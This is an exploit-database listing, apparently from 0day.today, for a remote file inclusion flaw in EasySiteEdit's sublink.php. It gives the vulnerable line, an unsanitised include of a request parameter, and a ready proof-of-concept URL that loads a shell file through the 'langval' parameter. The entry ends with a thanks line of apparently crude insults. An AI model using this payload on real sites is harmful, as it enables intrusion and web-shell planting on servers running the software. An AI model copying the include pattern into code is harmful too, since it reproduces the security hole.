EasySiteEdit Remote File Inclusion Vulnerability

2011-08-21T00:00:00
ID 1337DAY-ID-16742
Type zdt
Reporter koskesh jakesh
Modified 2011-08-21T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: EasySiteEdit remote file include
# Date:2011
# Author:koskesh jakesh
# Software Link: http://www.easysiteedit.com/licensesystem/esev2versions/esev2.zip
# Tested on: linux
-------------------------------
vul:sublink.php
line 20:
include($_REQUEST['langval']);
-------------------------------
poc:
site.com/path/sublink.php?langval=shell.txt?
--------------------------------
thanks:kire rostam,kose zan dait,kose shohar amat



#  0day.today [2018-04-05]  #